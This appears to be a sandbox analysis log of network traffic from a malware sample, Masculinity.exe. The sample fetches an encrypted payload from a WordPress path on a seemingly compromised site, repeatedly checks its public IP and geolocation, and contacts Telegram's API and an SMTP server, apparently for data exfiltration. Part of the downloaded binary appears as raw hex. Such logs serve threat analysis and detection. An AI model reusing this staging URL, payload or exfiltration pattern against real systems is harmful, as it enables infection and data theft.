                                            Jul 25, 2024 10:05:09.730678082 CEST192.168.2.51.1.1.10x1fb2Standard query (0)www.reap.skyestates.com.mtA (IP address)IN (0x0001)false
                                            Jul 25, 2024 10:05:12.441382885 CEST192.168.2.51.1.1.10x28e8Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                            Jul 25, 2024 10:05:21.737171888 CEST192.168.2.51.1.1.10x45b5Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                            Jul 25, 2024 10:06:02.144911051 CEST192.168.2.51.1.1.10x70b0Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                            Jul 25, 2024 10:06:09.119333982 CEST192.168.2.51.1.1.10xac78Standard query (0)smtp.privateemail.comA (IP address)IN (0x0001)false
                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Jul 25, 2024 10:05:09.982188940 CEST1.1.1.1192.168.2.50x1fb2No error (0)www.reap.skyestates.com.mt108.167.181.251A (IP address)IN (0x0001)false
                                            Jul 25, 2024 10:05:12.449825048 CEST1.1.1.1192.168.2.50x28e8No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                            Jul 25, 2024 10:05:12.449825048 CEST1.1.1.1192.168.2.50x28e8No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                            Jul 25, 2024 10:05:12.449825048 CEST1.1.1.1192.168.2.50x28e8No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                            Jul 25, 2024 10:05:12.449825048 CEST1.1.1.1192.168.2.50x28e8No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                            Jul 25, 2024 10:05:12.449825048 CEST1.1.1.1192.168.2.50x28e8No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                            Jul 25, 2024 10:05:12.449825048 CEST1.1.1.1192.168.2.50x28e8No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                            Jul 25, 2024 10:05:21.748289108 CEST1.1.1.1192.168.2.50x45b5No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                            Jul 25, 2024 10:05:21.748289108 CEST1.1.1.1192.168.2.50x45b5No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                            Jul 25, 2024 10:06:02.157700062 CEST1.1.1.1192.168.2.50x70b0No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                            Jul 25, 2024 10:06:09.129265070 CEST1.1.1.1192.168.2.50xac78No error (0)smtp.privateemail.com66.29.159.53A (IP address)IN (0x0001)false
                                            • www.reap.skyestates.com.mt
                                            • reallyfreegeoip.org
                                            • api.telegram.org
                                            • checkip.dyndns.org
                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.549716193.122.6.16880528C:\Users\user\AppData\Local\Temp\Masculinity.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 25, 2024 10:05:12.465281010 CEST151OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Connection: Keep-Alive
                                            Jul 25, 2024 10:05:20.347295046 CEST320INHTTP/1.1 200 OK
                                            Date: Thu, 25 Jul 2024 08:05:20 GMT
                                            Content-Type: text/html
                                            Content-Length: 103
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: 20f8223d378a7f1a76a0949749c0e092
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                            Jul 25, 2024 10:05:20.350888968 CEST127OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Jul 25, 2024 10:05:21.518094063 CEST320INHTTP/1.1 200 OK
                                            Date: Thu, 25 Jul 2024 08:05:21 GMT
                                            Content-Type: text/html
                                            Content-Length: 103
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: cf93e2e900d6d34eeac164aa293f81d5
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                            Jul 25, 2024 10:05:22.442203999 CEST127OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Jul 25, 2024 10:05:23.832575083 CEST320INHTTP/1.1 200 OK
                                            Date: Thu, 25 Jul 2024 08:05:23 GMT
                                            Content-Type: text/html
                                            Content-Length: 103
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: c7ffd49f44eba9452671805c5dbfe56b
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            1192.168.2.549719193.122.6.16880528C:\Users\user\AppData\Local\Temp\Masculinity.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 25, 2024 10:05:24.478636026 CEST127OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Jul 25, 2024 10:05:32.717781067 CEST320INHTTP/1.1 200 OK
                                            Date: Thu, 25 Jul 2024 08:05:32 GMT
                                            Content-Type: text/html
                                            Content-Length: 103
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: a1d14bac7f0688485bddcee630e1df93
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            2192.168.2.549722193.122.6.16880528C:\Users\user\AppData\Local\Temp\Masculinity.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 25, 2024 10:05:33.376296997 CEST151OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Connection: Keep-Alive
                                            Jul 25, 2024 10:05:45.499855995 CEST320INHTTP/1.1 200 OK
                                            Date: Thu, 25 Jul 2024 08:05:45 GMT
                                            Content-Type: text/html
                                            Content-Length: 103
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: 7ed9eedac0f08763d02dcb54518132c5
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            3192.168.2.549724193.122.6.16880528C:\Users\user\AppData\Local\Temp\Masculinity.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 25, 2024 10:05:46.120785952 CEST151OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Connection: Keep-Alive
                                            Jul 25, 2024 10:05:52.240860939 CEST730INHTTP/1.1 502 Bad Gateway
                                            Date: Thu, 25 Jul 2024 08:05:51 GMT
                                            Content-Type: text/html
                                            Content-Length: 547
                                            Connection: keep-alive
                                            X-Request-ID: 639a76874d0553b65c92ce7dcb30c7f9
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED]
                                            Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                            Jul 25, 2024 10:05:52.241206884 CEST730INHTTP/1.1 502 Bad Gateway
                                            Date: Thu, 25 Jul 2024 08:05:51 GMT
                                            Content-Type: text/html
                                            Content-Length: 547
                                            Connection: keep-alive
                                            X-Request-ID: 639a76874d0553b65c92ce7dcb30c7f9
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED]
                                            Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            4192.168.2.549725193.122.6.16880528C:\Users\user\AppData\Local\Temp\Masculinity.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 25, 2024 10:05:52.266782045 CEST151OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Connection: Keep-Alive
                                            Jul 25, 2024 10:05:53.057436943 CEST320INHTTP/1.1 200 OK
                                            Date: Thu, 25 Jul 2024 08:05:52 GMT
                                            Content-Type: text/html
                                            Content-Length: 103
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: bd62b77f23f098cff753640559bd4878
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            5192.168.2.549727193.122.6.16880528C:\Users\user\AppData\Local\Temp\Masculinity.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 25, 2024 10:05:53.761452913 CEST151OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Connection: Keep-Alive
                                            Jul 25, 2024 10:05:56.685353994 CEST320INHTTP/1.1 200 OK
                                            Date: Thu, 25 Jul 2024 08:05:56 GMT
                                            Content-Type: text/html
                                            Content-Length: 103
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: 70e12ccb296f43d0e6e375e7e731eedb
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            6192.168.2.549729193.122.6.16880528C:\Users\user\AppData\Local\Temp\Masculinity.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 25, 2024 10:05:57.390372038 CEST151OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Connection: Keep-Alive
                                            Jul 25, 2024 10:05:59.175483942 CEST320INHTTP/1.1 200 OK
                                            Date: Thu, 25 Jul 2024 08:05:59 GMT
                                            Content-Type: text/html
                                            Content-Length: 103
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: d87d8b7b6f71a8c63880d83b2c6b7142
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            7192.168.2.549731193.122.6.16880528C:\Users\user\AppData\Local\Temp\Masculinity.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 25, 2024 10:05:59.821676970 CEST151OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Connection: Keep-Alive
                                            Jul 25, 2024 10:06:01.481292009 CEST320INHTTP/1.1 200 OK
                                            Date: Thu, 25 Jul 2024 08:06:01 GMT
                                            Content-Type: text/html
                                            Content-Length: 103
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: ca7fc6f5e3e37980df66808404c6885b
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.549715108.167.181.251443528C:\Users\user\AppData\Local\Temp\Masculinity.exe
                                            TimestampBytes transferredDirectionData
                                            2024-07-25 08:05:10 UTC196OUTGET /wp-includes/MGGxuAN14.bin HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                            Host: www.reap.skyestates.com.mt
                                            Cache-Control: no-cache
                                            2024-07-25 08:05:10 UTC249INHTTP/1.1 200 OK
                                            Date: Thu, 25 Jul 2024 08:05:10 GMT
                                            Server: Apache
                                            Upgrade: h2,h2c
                                            Connection: Upgrade, close
                                            Last-Modified: Tue, 23 Jul 2024 21:19:45 GMT
                                            Accept-Ranges: bytes
                                            Content-Length: 277056
                                            Content-Type: application/octet-stream
                                            2024-07-25 08:05:10 UTC7943INData Raw: c0 6b e5 25 68 6b f0 92 64 4c 17 10 eb 7b fc e6 64 9a 0c 89 f4 6e 9f 26 80 d9 0c ab 11 a2 42 28 5a ef 01 f3 2b da be 39 f8 97 38 95 48 c5 c6 f1 99 75 49 8b 04 de 76 2f 4a bf 4d f1 27 2c f6 a6 2a 3e 69 e2 63 58 6e 82 58 67 60 ab bc 81 ad 53 23 cf 70 b8 45 d1 01 25 2d 39 0c a4 d3 ec 26 d8 6e 0e eb c4 bb e7 f7 9d b1 09 f2 2b 04 f3 79 d2 c3 7b ff cb ee f5 1c 67 69 98 22 57 f3 7e d3 36 5e 68 90 4a 62 d6 ee 74 62 3c 1a 40 4c fe d8 47 be 12 24 d0 f8 42 ee b2 b1 21 46 7d 2a a8 cc 7e ef 06 0f 7f a2 4d 9e 8d de 6d 23 28 90 80 33 44 03 e0 02 3e 7a 56 53 27 a5 a6 1e 79 9a cc 33 33 71 d7 24 2e ba 5a 8f 51 60 c2 d6 b8 2d ce 5d 5a 38 61 ea fa 55 89 98 bd db c2 77 c8 6f d3 25 8c 90 81 17 17 97 69 d7 f2 2b 53 da f4 42 cf 2b e9 bc 3c 1d c8 83 98 a6 87 3c 67 ad 7e c9 a2 04
                                            Data Ascii: k%hkdL{dn&B(Z+98HuIv/JM',*>icXnXg`S#pE%-9&n+y{gi"W~6^hJbtb<@LG$B!F}*~Mm#(3D>zVS'y33q$.ZQ`-]Z8aUwo%i+SB+<<g~
                                            2024-07-25 08:05:10 UTC8000INData Raw: 6a 92 3c 93 6e 0a c9 47 88 35 99 a5 5d a2 9e f7 d6 4c dd 59 7d 27 25 1f 90 1a f6 81 da 60 3e ac 9a fe 82 d4 b7 e6 6f 47 0e e6 95 b7 4f ed 64 35 f2 9b 43 5d 87 47 7d 2e 2c d3 cd 24 3e ac 1d 2b 24 b9 5c 48 33 e5 fd d2 bb 2d 4c 82 80 77 9f f2 87 ee df e4 da 8c c8 a3 87 58 14 f8 d1 74 21 ea a2 19 1f b1 cb 77 05 f0 aa 91 4a 38 19 7f 8b 03 90 1b 63 a7 6a 25 ed bc 0d 79 2c 99 03 3a 48 4d ea 46 c9 57 5f 3e 55 b5 7c 9c 0f 9f da f9 eb 3d 90 2f 50 f7 52 b9 47 81 85 b5 2f a6 6f 1e 06 15 63 3e 59 d6 1a 4f 5a 1d 46 1b 36 2b 41 59 15 3d 33 54 f9 25 82 0d 8d 93 68 69 7d d5 24 bd 7d 19 4c 52 fd 01 01 8d 3c 8b 2c 72 f2 95 90 85 a0 78 9b 32 5a 85 76 f9 cb 1f c5 05 d5 8c bf a0 59 81 f8 a8 51 8d f9 4a 1a bc 34 8f 42 f2 93 3c 67 85 53 ca 15 ec c2 c1 08 51 ec 81 70 41 c6 e5 da
                                            Data Ascii: j<nG5]LY}'%`>oGOd5C]G}.,$>+$\H3-LwXt!wJ8cj%y,:HMFW_>U|=/PRG/oc>YOZF6+AY=3T%hi}$}LR<,rx2ZvYQJ4B<gSQpA
                                            2024-07-25 08:05:10 UTC8000INData Raw: e8 be 30 6b 97 1d 2a 40 d1 93 ef dc 25 52 1f af a3 e3 7e 17 4b 6b a2 5a 67 34 05 4d 43 6a ad b8 61 3e 8f 1f 3c 25 3b e4 58 37 4b 6a 4b 36 d3 df 42 22 e4 04 fc 12 09 83 c2 70 55 d3 a2 ca e8 9f e3 c3 fe 22 97 8b e6 33 59 ab 4d 4a ae 50 eb f8 b6 f0 63 e8 8a 43 4f de fa 9c 49 09 f7 91 8e 68 66 44 91 a9 a8 46 31 c0 35 e1 3c d1 aa 26 52 da d6 70 67 62 79 ff 60 58 6a f0 f4 72 60 db 3d 65 ad 53 9f a0 c9 b8 45 d7 29 86 6d 39 06 8c ba ec 26 de 6e 0e eb b6 77 f2 f7 ed b2 66 43 2b 04 f5 51 71 c3 7b f5 e3 87 f5 1c 61 69 b2 22 44 43 7c d3 05 50 77 2a 60 62 62 f6 b9 3d e6 1b 0c 85 f3 8b 51 b5 61 04 a4 a1 3b f7 a1 d0 4c 62 e0 4d 01 a2 11 9d 55 9c 1a 82 35 ce 63 9c 04 4d 0c a7 3d 60 64 64 85 60 34 a7 5b 5e 27 81 8c 1e 6a aa c8 33 64 21 92 24 31 f6 5b 9d 51 a4 ca 06 de 2d
                                            Data Ascii: 0k*@%R~KkZg4MCja><%;X7KjK6B"pU"3YMJPcCOIhfDF15<&Rpgby`Xjr`=eSE)m9&nwfC+Qq{ai"DC|Pw*`bb=Qa;LbMU5cM=`dd`4[^'j3d!$1[Q-
                                            2024-07-25 08:05:10 UTC8000INData Raw: 0d bd 35 93 b2 25 f5 88 fd 8e 38 f5 d8 77 f9 2f 0f 44 1a f9 93 cb 70 07 cb 98 cf 1a c9 2d a6 6f 47 0f c3 83 c4 1d 49 d0 45 42 fb 54 75 32 5c 4d 2e 8e 3e d5 56 18 bd 1d 5b 97 9c 45 45 a6 e5 fd dc 12 7a 74 fe bb 04 b7 d4 25 cb c2 b2 b9 8c c8 ad e4 23 00 8a bf d8 04 86 c7 74 09 b1 bb d4 08 93 a2 33 65 38 0f 15 a9 14 1d 9f 11 6d 7b 00 8b bd b9 dd 3f 9f 1e 04 18 4c f9 58 fe 52 60 fe c4 98 7e a1 2d f8 df ef 7b 15 8b 2f 5c fd 5e 96 42 33 8b bf 5f d8 d3 36 d2 1f 6e 46 10 c2 68 e3 59 19 3f 0a ab 2b 41 57 74 d8 08 4c 98 33 f8 94 58 93 62 17 11 c3 56 48 7e 11 2d 72 c4 b3 01 87 25 8f 39 65 91 a7 f8 36 d0 17 47 21 53 9e 7f fc 4a c1 d2 1e c3 ef c5 fc 59 80 de b6 58 9b 9b 2d 5a ad 35 90 2c 25 93 36 6d 59 53 d9 0e 2a 5e 8d 4a 0a 34 81 7a 58 cc f4 d9 6f 88 f0 4c 71 2b b9
                                            Data Ascii: 5%8w/Dp-oGIEBTu2\M.>V[EEzt%#t3e8m{?LXR`~-{/\^B3_6nFhY?+AWtL3XbVH~-r%9e6G!SJYX-Z5,%6mYS*^J4zXoLq+
                                            2024-07-25 08:05:10 UTC8000INData Raw: 40 d6 ec 50 dc 25 1d 12 a6 aa f5 76 99 22 96 f9 5a 67 8e 05 44 2c 82 ab b8 6b 2e 51 13 3c 69 17 e3 50 58 4a 6a 4b 31 d4 03 9c 17 c1 2c c8 21 0e 89 d1 64 55 fb c0 8f e8 95 3f 81 c8 21 97 d4 e6 33 27 9e 4d 4a bb 22 c2 e7 b6 80 71 be 10 43 4f d0 83 db 48 1a f4 96 a3 d0 c2 46 9b bf 28 6a 3b c6 1d b9 73 c8 aa 56 40 9d ee 70 67 6e ef 1c 61 4b 68 93 5a 5e 50 aa 43 7e ad 47 65 c9 4d b8 45 d7 72 e5 6d 39 06 8c 12 ec 26 d2 6e 7d 29 c4 bb ed e4 9a a0 0e 8c 11 04 f3 7d a1 00 7b ff c1 81 31 1c 67 63 98 33 50 1c bb d3 36 5a 09 17 44 62 66 88 7f 43 84 11 0c 90 d8 fe 1d c7 61 74 88 3e 2d 89 ca a2 04 76 1e 3b ee f9 11 9b 2c 02 dd 82 3f e1 e3 ef 03 50 85 94 cf 60 65 4b 99 14 93 4f 5b 2e 8f a4 b1 36 cd 9a cc 39 91 04 8a 56 08 f9 5b fc f3 9c 5e 38 e6 2d ce 59 f8 1d 7b 98 c1
                                            Data Ascii: @P%v"ZgD,k.Q<iPXJjK1,!dU?!3'MJ"qCOHF(j;sV@pgnaKhZ^PC~GeMErm9&n})}{1gc3P6ZDbfCat>-v;,?P`eKO[.69V[^8-Y{
